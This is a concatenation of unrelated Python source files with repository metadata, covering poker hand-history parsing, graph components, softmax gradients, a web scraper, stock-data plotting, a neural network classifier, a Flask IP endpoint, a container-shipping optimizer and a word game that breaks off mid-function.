dealer_exists = True
break
if dealer_exists == False:
for elem in hh:
if 'type="1"' in elem and '[cards]' in elem:# finds SB
for sub_string in elem.split(): # iterates through SB to find player name
if 'player=' in sub_string:
SB = sub_string.replace('player="', '').replace('"','')
break
for idx, elem in enumerate(pos_lst): # iterate through pos_lst to get SB position
if SB in elem:
SB_idx = idx
break
if SB_idx == 0:
dealer_pos = len(pos_lst) - 1 # if SB is the 1st in list
else:
dealer_pos = SB_idx - 1 # otherwise just backstep 1
if dealer_pos != len(pos_lst) - 1: # if dealer isn't in last position
beginning = pos_lst[dealer_pos + 1 : ] # subset so lists are sequential
rest = pos_lst[ : dealer_pos + 1]
for elem in beginning: # first part of list
if 'name="Hero"' in elem: # in the case of hero being found
hero_counter += 1
hero_pos = hero_counter
hero_found = True
break
else:
hero_counter += 1
if hero_found == False: # if hero not found in first iteration
for elem in rest:
if 'name="Hero"' in elem:
hero_counter += 1
hero_pos = hero_counter
hero_found = True
break
else:
hero_counter += 1
else:
for elem in pos_lst: # in the event the dealer is in last position
if 'name="Hero"' in elem:
hero_counter += 1
hero_pos = hero_counter
hero_found = True
break
else:
hero_counter += 1
if hero_found:
result = hero_pos / len(pos_lst) # divides position by total number of players
return result
def table_max(hh):
"""max number of seats at the table, always greater or equal to number of players at table
Args:
hh:'HandHistory' column, string data of hands
Returns:
int: max players
"""
result = None
for elem in hh:
if 'maxplayers' in elem:
result = int(elem.replace('<maxplayers>', '').replace('</maxplayers>',''))
break
return result
def my_blind_anti_total(hh):
"""Finds how much I put in in blinds/anti
Args:
hh:'HandHistory' column, string data of hands
Returns:
float: amount blinded or antied
"""
action_list = []
result = 0
for elem in hh:
if '[cards]' in elem and 'Hero' in elem:
action_list.append(elem)
for elem in action_list:
for sub_string in elem.split():
if 'sum' in sub_string:
result += float(sub_string.replace('sum="', '').replace('"', '').strip())
return result
def bets_before_my_preflop_action(hh):
"""Finds amount bet prior to my preflop action (total sum of)
Args:
hh:'HandHistory' column, string data of hands
Returns:
float: amount opponents bet before my action
"""
start = 0
stop = 0
total=0
subset = []
for idx, elem in enumerate(hh): # find beginning/end of preflop action
if 'Pocket' in elem:
start = idx
if '<round no="2">' in elem: # WILL probably have to change this for instances when there was no round2
stop = idx
break
if stop != 0:
subset = hh[start+1:stop-1]
for idx, elem in enumerate(subset): # iterates through subset to find my first action
if 'Hero' in elem:
subset = subset[:idx]
break
for elem in subset:
for elem in elem.split():
if 'sum' in elem:
total += float(elem.replace('sum="', '').replace('"',''))
return total
def action_type(hh):
"""types of actions a player made preflop,
Args:
hh:'HandHistory' column, string data of hands
Returns:
dictionary: dictionary with the actions all players took in hand according to types as determined by DriveHud
"""
result = {}
start = 0
stop = 0
player = None
action_type = None
for idx, elem in enumerate(hh): # finds start of preflop action
if 'Pocket' in elem:
start = idx
subset = hh[start+1:]
for idx, elem in enumerate(subset):# finds end of preflop action
if '</round>' in elem:
stop = idx
break
subset = subset[:stop]
for elem in subset: # iterating through preflop action to find player/type
for sub_elem in elem.split():
if 'player' in sub_elem:
player = sub_elem.replace('player="', '').replace('"', '')
if 'type' in sub_elem:
action_type = int(sub_elem.replace('type="', '').replace('"', ''))
if player in result: # checks to see if player has already taken an action
break
else:
result[player] = action_type
return result
def player_names(hh):
"""gets names of all the players in hand
Args:
hh:'HandHistory' column, string data of hands
Returns:
list: all of the players in hand as string values
"""
player = None
result = []
for elem in hh:
if 'dealer' in elem:
for sub_elem in elem.split(): # finds lines where player names are specified
if 'name' in sub_elem:
player = sub_elem.replace('name="', '').replace('"', '')
result.append(player)
break
return result
def players_before(hh):
""" finds all players having entered hand before my action (acted but didn't fold)
Args:
hh:'HandHistory' column, string data of hands
Returns:
list: string values of all players having entered hand before my first action
"""
start = 0
stop = 0
players_before = [] # list of players before
for idx, elem in enumerate(hh): # list of players after
if 'Pocket' in elem:
start = idx
subset = hh[start+1:] # subset containing preflop action until end
for idx, elem in enumerate(subset):
if '</round>' in elem:
stop = idx
break
subset = subset[:stop] # subset containing just preflop action
for elem in subset:
action_type = 0
if 'Hero' in elem: # break if we find hero
break
else:
for sub_elem in elem.split():
if 'player' in sub_elem:
player_name = sub_elem.replace('player="', '').replace('"', '')
if 'type' in sub_elem:
action_type = int(sub_elem.replace('type="', '').replace('"', ''))
if action_type!= 0:
players_before.append(player_name)
return players_before
def players_after(hh):
"""finds players acting after me in hand (discludes players who have already made 1st action)
Args:
hh:'HandHistory' column, string data of hands
Returns:
set: all the players acting after me
"""
start = 0
stop = 0
hero_found = False
players_before = set() # set of players before
players_after = set() # set of players after
for idx, elem in enumerate(hh):
if 'Pocket' in elem:
start = idx
subset = hh[start+1:] # subset containing preflop action until end
for idx, elem in enumerate(subset):
if '</round>' in elem:
stop = idx
break
subset = subset[:stop] # subset containing just preflop action
for elem in subset:
if 'Hero' in elem: # set to true and skip if hero in elem
hero_found = True
continue
else:
for sub_elem in elem.split():
if 'player' in sub_elem:
player_name = sub_elem.replace('player="', '').replace('"', '')
if hero_found == False: # if hero yet to act add to players before
players_before.add(player_name)
else:
if player_name in players_before: # check to see that player hasn't already acted
break
else:
players_after.add(player_name) # if player hasn't acted add to players after
return players_after
def limpers(hh):
"""counts number of limpers prior to my first action
Args:
handhistory:'HandHistory' column, string data of hands
Returns:
int: number of players having limped
"""
count = 0
for idx, elem in enumerate(hh):
if 'Pocket' in elem:
start = idx
subset = hh[start+1:] # subset containing preflop action until end
for idx, elem in enumerate(subset):
if '</round>' in elem:
stop = idx
break
subset = subset[:stop] # subset containing just preflop action
for elem in subset:
if 'Hero' in elem or ('type="3"' not in elem and 'type="0"' not in elem): # breaks if action arrives to me OR someone doesn't limp/fold
break
else:
if 'type="3"' in elem:
count += 1
return count
def raises_and_reraises(hh): # pretty sure this works but consider checking to make sure
"""returns 1 if there was a raise, and 1 + n for ever n reraise after
Args:
hh:'HandHistory' column, hand history from apply function above - string data of hands
Returns:
        int: number of raises and reraises that occurred prior to my first action
"""
bet = 0
player_name = 0
player_amount_bet = {} # store amount bet to delineate shoves from calls (all shoves are shoves but some are raises and some are calls)
for elem in hh: # getting amount blinded/antied prior to betting
if '[cards]' in elem and ('type="1"' in elem or 'type="2"' in elem): # ignores antis
for sub_string in elem.split():
if 'player' in sub_string: # get player name
player_name = sub_string.replace('player="', '').replace('"', '')
if 'sum' in sub_string: # get amount blinded/antied
bet = float(sub_string.replace('sum="', '').replace('"', ''))
player_amount_bet[player_name] = bet # add player name as key and bet as value to dictionary
for idx, elem in enumerate(hh): # find beginning of pre-flop action
if 'Pocket' in elem:
start = idx
subset = hh[start+1:] # subset containing preflop action until end
for idx, elem in enumerate(subset): # find end of preflop action
if '</round>' in elem:
stop = idx
break
subset = subset[:stop] # subset containing just preflop action
count = 0 # variable to count the number of raises/reraises
for elem in subset:
if 'Hero' in elem: # ends process if action arrives to me
break
else:
if 'type="23"' in elem or 'type="7"' in elem: # finds shoves & raises
for sub_string in elem.split(): # gets amount shoved/raised & players name
if 'player' in sub_string:
player_name = sub_string.replace('player="', '').replace('"', '')
if 'sum' in sub_string:
bet = float(sub_string.replace('sum="', '').replace('"', ''))
if bet > max(player_amount_bet.values()): # finds whether bet was bigger than a call (type 7 is shove, which isn't necessarily a raise)
count += 1
if player_name in player_amount_bet: # adds player bet to amount from blinds
player_amount_bet[player_name] += bet
else:
player_amount_bet[player_name] = bet
return count
def callers(hh): # pretty sure this works but consider checking to make sure
"""number of players to have made a call - PROBABLY COULD USE ADDITIONAL CLEANUP
Args:
hh:'HandHistory' column, string data of hands
Returns:
        int: number of callers, only non-0 when there has been a raise and a subsequent call
"""
bet = 0
player_name = 0
player_amount_bet = {} # store amount bet to delineate shoves from calls (all shoves are shoves but some are raises and some are calls)
for elem in hh: # getting amount put in prior to betting
if '[cards]' in elem and ('type="1"' in elem or 'type="2"' in elem): # ignores antis
for sub_string in elem.split():
if 'player' in sub_string:
player_name = sub_string.replace('player="', '').replace('"', '')
if 'sum' in sub_string:
bet = float(sub_string.replace('sum="', '').replace('"', ''))
player_amount_bet[player_name] = bet
for idx, elem in enumerate(hh):
if 'Pocket' in elem:
start = idx
subset = hh[start+1:] # subset containing preflop action until end
for idx, elem in enumerate(subset):
if '</round>' in elem:
stop = idx
break
subset = subset[:stop] # subset containing just preflop action
    raise_happened = False  # flag set when a raise occurs
count = 0
for elem in subset:
if 'Hero' in elem:
break
for sub_string in elem.split(): # gets amount shoved or raised & players name
if 'player' in sub_string:
player_name = sub_string.replace('player="', '').replace('"', '')
if 'sum' in sub_string:
bet = float(sub_string.replace('sum="', '').replace('"', ''))
if ('type="23"' in elem or 'type="7"' in elem) and raise_happened == False: # finds shoves & raises, trying to avoid edge cases here but probably some extraneous stuff
if 'type="7"' in elem:
if bet > max(player_amount_bet.values()):# checks to see if shove was a raise or call
raise_happened = True
else: # for raises
raise_happened = True
if raise_happened:
if 'type="3"' in elem:
count += 1
if 'type="7"' in elem:
if bet <= max(player_amount_bet.values()):
count += 1
if player_name not in player_amount_bet:
player_amount_bet[player_name] = bet
else:
player_amount_bet[player_name] += bet
return count
| true
|
dd131b4529eceb1fb14c02010b498f83e901062d
|
Python
|
mkozel92/algos_py
|
/graphs/connected_components.py
|
UTF-8
| 1,418
| 3.59375
| 4
|
[] |
no_license
|
from graphs.graph_interface import Graph
class ConnectedComponents(object):
"""class to compute connected components of given graph"""
def __init__(self, g: Graph):
"""
init with a graph
:param g: Graph
"""
self.g = g
self.visited = [False] * self.g.get_size()
self.vertex_group = [0] * self.g.get_size()
def dfs(self, v: int, group: int):
"""
dfs to mark components from the same group
Complexity O(E + V)
:param v: starting vertex
:param group: current group number
"""
if self.visited[v]:
return
self.visited[v] = True
self.vertex_group[v] = group
for vertex in self.g.adj(v):
self.dfs(vertex, group)
def compute(self):
"""
Assign each vertex to a connected component
"""
group = 0
for i in range(len(self.visited)):
if not self.visited[i]:
self.dfs(i, group)
group += 1
def is_connected(self, p: int, q: int) -> bool:
"""
check if two vertices are in the same component
:param p: a vertex
:param q: a vertex
:return: True of the vertices are connected
"""
assert (p < self.g.get_size())
assert (q < self.g.get_size())
return self.vertex_group[p] == self.vertex_group[q]
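# --- A minimal usage sketch (not part of the original module), using a tiny
# --- adjacency-list class written here only for illustration; it just has to
# --- provide the get_size() and adj() methods that ConnectedComponents calls.
if __name__ == "__main__":
    class _TinyGraph:
        def __init__(self, size, edges):
            self._size = size
            self._adj = [[] for _ in range(size)]
            for p, q in edges:
                self._adj[p].append(q)
                self._adj[q].append(p)

        def get_size(self):
            return self._size

        def adj(self, v):
            return self._adj[v]

    g = _TinyGraph(5, [(0, 1), (1, 2), (3, 4)])
    cc = ConnectedComponents(g)
    cc.compute()
    print(cc.is_connected(0, 2))  # True: 0-1-2 form one component
    print(cc.is_connected(0, 3))  # False: 3-4 is a separate component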
| true
|
00ae973ba7e29f94f79273e2b6beb956c2120ecf
|
Python
|
fucusy/cs224d-dp-for-nlp
|
/q1_softmax.py
|
UTF-8
| 3,290
| 3.515625
| 4
|
[] |
no_license
|
import numpy as np
import random
from q2_gradcheck_fuc import gradcheck_naive
def softmax(x):
"""
Compute the softmax function for each row of the input x.
It is crucial that this function is optimized for speed because
it will be used frequently in later code.
You might find numpy functions np.exp, np.sum, np.reshape,
np.max, and numpy broadcasting useful for this task. (numpy
broadcasting documentation:
http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html)
You should also make sure that your code works for one
dimensional inputs (treat the vector as a row), you might find
it helpful for your later problems.
You must implement the optimization in problem 1(a) of the
written assignment!
"""
return softmax_loss_grad(x)[0]
def softmax_loss_grad(x):
shape = x.shape
if len(shape) == 0:
return np.array(1), np.array(0)
elif len(shape) == 1:
n = shape[0]
        new_x = x - np.max(x)  # subtract the row max (not min) so exp() cannot overflow; the result is unchanged
exp_x = np.exp(new_x)
result = exp_x / np.sum(exp_x)
grad = np.zeros((n, n))
i_equal_j = result * (1 - result)
for i in range(n):
for j in range(n):
if j == i:
grad[i][j] = i_equal_j[i]
else:
grad[i][j] = -1.0 * result[i] * result[j]
return result, grad
else:
result = []
grad = []
for num in x:
tmp_result, tmp_grad = softmax_loss_grad(num)
result.append(tmp_result)
grad.append(tmp_grad)
result = np.array(result)
grad = np.array(grad)
return result, grad
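# --- A small sanity sketch (not part of the original assignment code): softmax is
# --- invariant to adding a constant to every input, which is why subtracting the
# --- maximum before exponentiating avoids overflow without changing the result.
def _shift_invariance_demo():
    x = np.array([1001.0, 1002.0])
    a = softmax(x)
    b = softmax(x - np.max(x))  # same probabilities, exp() stays bounded
    print(np.allclose(a, b))    # expected: True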
def test_softmax_basic():
"""
Some simple tests to get you started.
Warning: these are not exhaustive.
"""
print "Running basic tests..."
test1 = softmax(np.array([1,2]))
print test1
assert np.amax(np.fabs(test1 - np.array(
[0.26894142, 0.73105858]))) <= 1e-6
test3 = softmax(np.array([[-1001,-1002]]))
print test3
assert np.amax(np.fabs(test3 - np.array(
[0.73105858, 0.26894142]))) <= 1e-6
test2 = softmax(np.array([[1001,1002],[3,4]]))
print test2
assert np.amax(np.fabs(test2 - np.array(
[[0.26894142, 0.73105858], [0.26894142, 0.73105858]]))) <= 1e-6
print "You should verify these results!\n"
def test_softmax():
"""
Use this space to test your softmax implementation by running:
python q1_softmax.py
This function will not be called by the autograder, nor will
your tests be graded.
"""
print "Running your tests..."
### YOUR CODE HERE
### END YOUR CODE
def your_sanity_checks():
"""
Use this space add any additional sanity checks by running:
python q2_gradcheck.py
This function will not be called by the autograder, nor will
your additional tests be graded.
"""
print "Running your sanity checks..."
print "checking softmax_loss_grad"
gradcheck_naive(softmax_loss_grad, np.array(123.456)) # scalar test
gradcheck_naive(softmax_loss_grad, np.random.randn(3,)) # 1-D test
gradcheck_naive(softmax_loss_grad, np.random.randn(4,5)) # 2-D test
if __name__ == "__main__":
test_softmax_basic()
your_sanity_checks()
| true
|
413b550ca29cc3258ee5e2a9eb7885ec8d7a523c
|
Python
|
ShaimaAnvar/python-challenge
|
/1.py
|
UTF-8
| 317
| 3.265625
| 3
|
[] |
no_license
|
n=int(input())
d={}
for i in range(n):
key,value = input().split(" ")
d[key]=value
querries = []
inp = input()
while len(inp)>0:
querries.append(inp)
inp=input()
for i in range(len(querries)):
if querries[i] in d:
print(querries[i]+"="+d[querries[i]])
else:
print("Not found")
| true
|
b045c9a45e036fe1a2ef007168a17ffc2a4a6aae
|
Python
|
MistyLeo12/small-projects
|
/web-scrapers/drink-scraper.py
|
UTF-8
| 345
| 2.796875
| 3
|
[] |
no_license
|
"""
Web scraper for getting drinks data to add to my random drink recipe project
"""
import requests
def scraper(url):
res = requests.get(url)
text = res.text
status_code = res.status_code
print(status_code)
return (text, status_code)
scraper('https://www.esquire.com/food-drink/drinks/g32402296/best-rum-cocktails/')
| true
|
9887ea36a28a911fcaf11a717177e37b35849ec9
|
Python
|
bozso11/playground
|
/getGoogleData.py
|
UTF-8
| 3,236
| 2.984375
| 3
|
[] |
no_license
|
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib import style
from matplotlib.finance import candlestick_ohlc  # note: removed from newer matplotlib releases; candlestick_ohlc now lives in the mpl_finance / mplfinance packages
import matplotlib.dates as mdates
import pandas as pd
import pandas_datareader.data as web
style.use('ggplot')
###################### Intro and Getting Stock Price Data - Python Programming for Finance p.1-2 ######################
# https://pythonprogramming.net/getting-stock-prices-python-programming-for-finance/
start = dt.datetime(2000, 1, 1)
end = dt.datetime(2016, 12, 31)
# df = web.DataReader('TSLA', "google", start, end)
# df2 = web.DataReader('MCO', "google", start, end)
# df.to_csv('TSLA.csv')
# df2.to_csv('MCO.csv')
df = pd.read_csv('tsla.csv', parse_dates=True, index_col=0)
df2 = pd.read_csv('mco.csv', parse_dates=True, index_col=0)
plt.figure(0)
df[['Open','Close']].plot()
# plt.show()
print(df[['High','Low']].tail())
plt.figure(1)
df2[['Open','Close']].plot()
# plt.show()
###################### Basic stock data Manipulation - Python Programming for Finance p.3 ######################
# https://pythonprogramming.net/stock-data-manipulation-python-programming-for-finance/
plt.figure(3)
figTitle = 'Moving average and Volume'
plt.title(figTitle)
windowSize = 100
df['100ma'] = df['Close'].rolling(window=windowSize, min_periods=0).mean()
ax1 = plt.subplot2grid((6,1), (0,0), rowspan=5, colspan=1)
ax2 = plt.subplot2grid((6,1), (5,0), rowspan=1, colspan=1,sharex=ax1)
ax1.plot(df.index, df['Close'])
ax1.plot(df.index, df['100ma'])
ax2.bar(df.index, df['Volume'])
###################### More stock manipulations - Python Programming for Finance p.4 ######################
# https://pythonprogramming.net/more-stock-data-manipulation-python-programming-for-finance/
figTitle = 'Resampled (decreased frequency) to 10 days'
plt.figure(4)
plt.title(figTitle)
df_ohlc = df['Close'].resample('10D').ohlc()
df_volume = df['Volume'].resample('10D').sum()
df_ohlc.reset_index(inplace=True)
df_ohlc['Date'] = df_ohlc['Date'].map(mdates.date2num)
ax1 = plt.subplot2grid((6,1), (0,0), rowspan=5, colspan=1)
ax2 = plt.subplot2grid((6,1), (5,0), rowspan=1, colspan=1, sharex=ax1)
ax1.xaxis_date()
candlestick_ohlc(ax1, df_ohlc.values, width=5, colorup='g')
ax2.fill_between(df_volume.index.map(mdates.date2num), df_volume.values, 0)
# plt.show()
###################### Automating getting the S&P 500 list - Python Programming for Finance p.5 ######################
# https://pythonprogramming.net/sp500-company-list-python-programming-for-finance/
import bs4 as bs
import pickle
import requests
def save_sp500_tickers():
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17'}
resp = requests.get('http://en.wikipedia.org/wiki/List_of_S%26P_500_companies',
headers=headers)
soup = bs.BeautifulSoup(resp.text, 'lxml')
table = soup.find('table', {'class': 'wikitable sortable'})
tickers = []
for row in table.findAll('tr')[1:]:
ticker = row.findAll('td')[0].text
tickers.append(ticker)
with open("sp500tickers.pickle", "wb") as f:
pickle.dump(tickers, f)
return tickers
# sp500 = save_sp500_tickers()
exit(1)
| true
|
5d5f0c9feba8b9f528e899bbba827500e9a1ae53
|
Python
|
swetasuman94/Machine-Learning
|
/Neural_network_model_on_Banknote_Authentication/ScikitLearnLab_part2.py
|
UTF-8
| 2,491
| 3.109375
| 3
|
[] |
no_license
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from pandas.plotting import scatter_matrix
from sklearn.model_selection import train_test_split
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import classification_report,confusion_matrix
class NeuralNet:
def __init__(self, url):
names = ['variance', 'skewness', 'curtosis', 'entropy', 'class']
self.df = pd.read_csv(url, header=None, names=names)
def plotGraph(self):
self.df.iloc[:, 0:4].hist()
correlations = self.df.iloc[:, 0:4].corr()
# plot correlation matrix
fig = plt.figure()
ax = fig.add_subplot(111)
cax = ax.matshow(correlations, vmin=-1, vmax=1)
fig.colorbar(cax)
ticks = np.arange(0, 4, 1)
ax.set_xticks(ticks)
ax.set_yticks(ticks)
ax.set_xticklabels(self.df.iloc[:, 0:4].columns)
ax.set_yticklabels(self.df.iloc[:, 0:4].columns)
plt.title("Correlation Matrix \n")
plt.show()
#create a scatterplot
scatter_matrix(self.df.iloc[:, 0:4])
plt.show()
def preProcess(self):
nrows, ncols = self.df.shape[0], self.df.shape[1]
X = self.df.iloc[:, 0:(ncols - 1)].values.reshape(nrows, ncols - 1)
Y = self.df.iloc[:, ncols - 1].values
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.25, random_state=np.random)
return X_train, X_test, Y_train, Y_test
# Below is the training function
def train(self, X_train, Y_train):
model = MLPClassifier(hidden_layer_sizes=(7, 7), alpha=0.0003, max_iter=500)
model.fit(X_train, Y_train)
return model
# predict on test dataset
def predict(self, model, X_test, Y_test):
predictions = model.predict(X_test)
print("Intercepts for neurons :", model.intercepts_)
print("Weights for neurons :", model.coefs_)
print("Confusion Matrix :")
print(confusion_matrix(Y_test, predictions))
print("Classification Report :")
print(classification_report(Y_test, predictions))
if __name__ == "__main__":
url = "http://archive.ics.uci.edu/ml/machine-learning-databases/00267/data_banknote_authentication.txt"
neural_network = NeuralNet(url)
neural_network.plotGraph()
X_train, X_test, Y_train, Y_test = neural_network.preProcess();
model = neural_network.train(X_train, Y_train)
neural_network.predict(model, X_test, Y_test)
| true
|
8ad7d1ea5b6dc0d83ab423ad0057be2d44e660f2
|
Python
|
mik-laj/docker-swarm-gcp
|
/app.py
|
UTF-8
| 552
| 2.546875
| 3
|
[] |
no_license
|
from flask import Flask
from flask import jsonify
from flask import request
import os
import socket
app = Flask(__name__)
@app.route("/ip", methods=["GET"])
def get_my_ip():
resp = {}
resp['ip'] = request.remote_addr
if request.environ.get('HTTP_X_FORWARDED_FOR') is not None:
resp['for'] = request.environ['HTTP_X_FORWARDED_FOR']
return jsonify(resp), 200
@app.route("/")
def hello():
html = "<h1>Hello, Awesome Awesome Some World! </h1>"
return html
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)
| true
|
2bfb908d6e75af6dc620d084f5998fb3b00fbcca
|
Python
|
pawdon/software_engineering
|
/optimizer_module/greedy_optimizer_file.py
|
UTF-8
| 8,787
| 2.921875
| 3
|
[] |
no_license
|
from .abstract_optimizer_file import IOptimizer
from .shipments_manager_file import ShipmentsManager, Shipment, PlacedContainer, CornerPosition
from containers_module.containers_manager_file import ContainersManager
class GreedyOptimizer(IOptimizer):
"""
    A greedy optimizer class.
"""
def __init__(self):
"""
Constructor.
"""
super().__init__()
self.sorted_containers = None
@staticmethod
def info():
"""
Return a string with information describing the optimizer.
:return: a string with information describing the optimizer
"""
return "Greedy optimizer"
@staticmethod
def prioritize_containers(c):
"""
A function defining how to sort containers.
:param c: a container
:return: a tuple of arguments used for comparing containers
"""
return c.timestamp, -(c.length * c.width)
def optimize_single_level(self, shipment, sorted_containers, single_level=None, if_sort_by_width=False):
"""
Place containers on a single level of a single ship in an optimal way.
:param shipment: a shipment with a ship
:param sorted_containers: a sorted list of containers
:param single_level: (int) a level number where to place containers (if None, place wherever)
:param if_sort_by_width: (bool) if True, sort empty points by width, else sort them by length
:return: None
"""
if single_level is None:
single_level = shipment.get_used_levels_nr()
for container in sorted_containers:
self.place_container(shipment, container, single_level, if_sort_by_width)
def optimize_single_shipment(self, shipment, sorted_containers,
check_urgent_containers=False,
main_timestamp=None,
if_sort_by_width=False):
"""
Place containers on a single ship in an optimal way using a greedy algorithm.
:param shipment: a shipment with a ship
:param sorted_containers: a sorted list of containers
:param check_urgent_containers: (bool) if True, check timestamps of containers
:param main_timestamp: a main timestamp
:param if_sort_by_width: (bool) if True, sort empty points by width, else sort them by length
:return: a shipment with containers
"""
correct_shipment = True
containers_copy = sorted_containers.copy()
one_level_shipments = [shipment.copy(only_ship=True) for _ in range(shipment.levels_nr)]
one_level_used = [False for _ in range(shipment.levels_nr)]
for sh in one_level_shipments:
self.optimize_single_level(sh, containers_copy, single_level=0, if_sort_by_width=if_sort_by_width)
for cont in sh.get_all_containers():
containers_copy.remove(cont)
one_level_shipments.sort(key=lambda x: x.get_empty_volume(only_used_levels=True))
while True:
anything_joined = False
for i, sh in enumerate(one_level_shipments):
if not one_level_used[i]:
success = shipment.check_and_join(sh)
one_level_used[i] = success
if success:
anything_joined = True
if not anything_joined or all(one_level_used):
break
if not all(one_level_used):
for container in sorted_containers:
self.place_container(shipment, container)
placed_containers = shipment.get_all_containers()
if check_urgent_containers:
for container in sorted_containers:
if container.timestamp == main_timestamp:
break
elif container not in placed_containers:
correct_shipment = False
return correct_shipment
def check_and_add_shipment(self, shipment):
"""
Check if a given shipment can be added to the shipments manager.
If so, do it and remove used containers from the list.
:param shipment: a shipment to add
:return: True if successfully added, else False
"""
success = self.shipments_manager.check_and_add(shipment)
if success:
for container in shipment.get_all_containers():
self.sorted_containers.remove(container)
return success
def choose_and_add_shipment(self, shipments_list):
"""
Add a shipment with the smallest relative empty volume to the shipments manager.
:param shipments_list: a list of shipments
:return: True if successfully added, else False
"""
success = False
shipments_list.sort(key=lambda x: x.get_empty_volume() / x.get_full_volume())
for sh in shipments_list:
success = self.check_and_add_shipment(sh)
if success:
break
return success
def optimize(self, ships, containers, timestamp, container_height, previous_shipment):
"""
Place containers on ships in an optimal way.
:param ships: list of available ships
:param containers: a list container to place
:param timestamp: a main timestamp of containers
:param container_height: a constant height of containers
:param previous_shipment: the last (unsent) shipment returned by previous optimization
Situation when it is used:
During the latest optimization we had a big ship and we could place 100 containers
on it. We placed 75 containers and hoped we would place more so we didn't send
this shipment. Now the biggest ship can contain 50 containers. In this situation
we send the shipment based on the previous big ship.
:return: a shipment manager with list of shipment to send
"""
self.container_height = container_height
self.containers = containers
self.ships = ships
self.timestamp = timestamp
self.previous_shipment = previous_shipment
self.shipments_manager = ShipmentsManager(timestamp)
if self.report_generator is not None:
self.report_generator.log("******* OPTIMIZER LOG START *******")
self.report_generator.increase_indent()
self.sorted_containers = sorted(containers, key=self.prioritize_containers)
if self.report_generator is not None:
self.report_generator.log(f"{len(self.sorted_containers)} containers to place.")
first_shipments = [Shipment(ship=s, containers_height=container_height) for s in ships]
correct_first_shipments = [sh for sh in first_shipments if
self.optimize_single_shipment(sh, self.sorted_containers,
check_urgent_containers=True,
main_timestamp=timestamp)]
if len(correct_first_shipments) == 0:
if self.report_generator is not None:
"""
That is the described situation when to use previous_shipment.
"""
self.report_generator.log("CAN NOT SEND CONTAINERS WITH PREVIOUS TIMESTAMPS USING CURRENT SHIPS."
"PREVIOUS SHIP IS USED")
self.check_and_add_shipment(previous_shipment)
else:
self.choose_and_add_shipment(correct_first_shipments)
while len(self.sorted_containers) > 0:
self.report_generator.log(f"{len(self.sorted_containers)} containers to place.")
shipments = [Shipment(ship=s, containers_height=container_height) for s in ships]
for sh in shipments:
self.optimize_single_shipment(sh, self.sorted_containers)
self.choose_and_add_shipment(shipments)
if self.report_generator is not None:
self.report_generator.decrease_indent()
self.report_generator.log("******* OPTIMIZER LOG STOP ********\n")
return self.shipments_manager
def test():
cm = ContainersManager()
cm.add("c10,1,2,2,5", min_timestamp=0)
cm.add("c11,1,2,2,2", min_timestamp=0)
cm.add("c12,3,2,2,3", min_timestamp=0)
cm.add("c13,1,2,2,3", min_timestamp=0)
cm.add("c14,1,2,2,4", min_timestamp=0)
opt = GreedyOptimizer()
containers = cm.waiting_containers
print(containers)
s = sorted(containers, key=opt.prioritize_containers)
print(s)
if __name__ == "__main__":
test()
| true
|
cf7ea6439e36a09995fe4797151820cf5484532e
|
Python
|
edwgk/Python_class
|
/unit_1_example07_function.py
|
UTF-8
| 375
| 2.984375
| 3
|
[] |
no_license
|
def saludar(nombre,mensaje='msj por defecto'):
    #default message used if the caller omits the parameter
    #parameters with default values must come after parameters without defaults
print(mensaje,nombre)
return mensaje + '_' + nombre
cadenaCaracteres=saludar('Oscar','Mensaje prueba')
print(cadenaCaracteres)
cadenaCaracteres2=saludar('Oscar')
print(cadenaCaracteres2)
| true
|
295be3d5a4769f2eaedba8aca9a72fc0e53670b3
|
Python
|
aparrish/characterror
|
/game.py
|
UTF-8
| 26,177
| 2.59375
| 3
|
[
"MIT",
"CC-BY-3.0",
"CC-BY-4.0",
"ISC",
"Apache-2.0"
] |
permissive
|
# Copyright (c) 2011, Adam Parrish <adam@decontextualize.com>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import random
import string
from threading import Thread
from gamestate import GameState, GameStateManager
from lettertree import LetterTree
from tweener import Tweener
from java import lang
from ddf.minim import Minim
# janky but accurate!
initletterprob = ''.join([
'x' * 1,
'y' * 1,
'z' * 1,
'q' * 1,
'j' * 2,
'k' * 3,
'v' * 4,
'n' * 5,
'w' * 5,
'i' * 6,
'u' * 7,
'o' * 7,
'l' * 7,
'h' * 8,
'g' * 8,
'e' * 9,
'f' * 9,
't' * 12,
'r' * 13,
'm' * 13,
'd' * 13,
'a' * 13,
'b' * 14,
'p' * 19,
'c' * 20,
's' * 28])
play_offset_x = 100
fighter_offset_x = 250
play_offset_y = 100
def overdraw(things, count):
return [random.choice(things) for i in range(count)]
class TargetString(object):
def __init__(self, content, tree, x, y):
self.content = content
self.tree = tree
self.x = x
self.y = y
self.is_word = False
self.is_prefix = True # assuming our corpus contains every letter as initial
self.alpha = 255
self.textsize = 16
self.active = True
self.unique = random.randrange(100)
def subsume(self, letter):
self.content += letter
self.is_word = self.tree.is_word(self.content)
self.is_prefix = self.tree.is_prefix(self.content)
def draw(self):
if self.is_word:
fill(0, 255, 0, self.alpha)
elif self.is_prefix:
fill(255, 255, 255, self.alpha)
else:
print "%s is neither word nor prefix" % self.content
textSize(self.textsize)
textAlign(LEFT)
for i, ch in enumerate(self.content):
if len(self.content) == 1 and i == 0:
fill(255, 0, 0, self.alpha)
xoff = sin(i + self.unique + millis() / 50.0) * 1.25
yoff = cos(i + self.unique + millis() / 54.0) * 1.25
else:
xoff = sin(i + self.unique + millis() / 200.0) * 1.25
yoff = cos(i + self.unique + millis() / 205.0) * 1.25
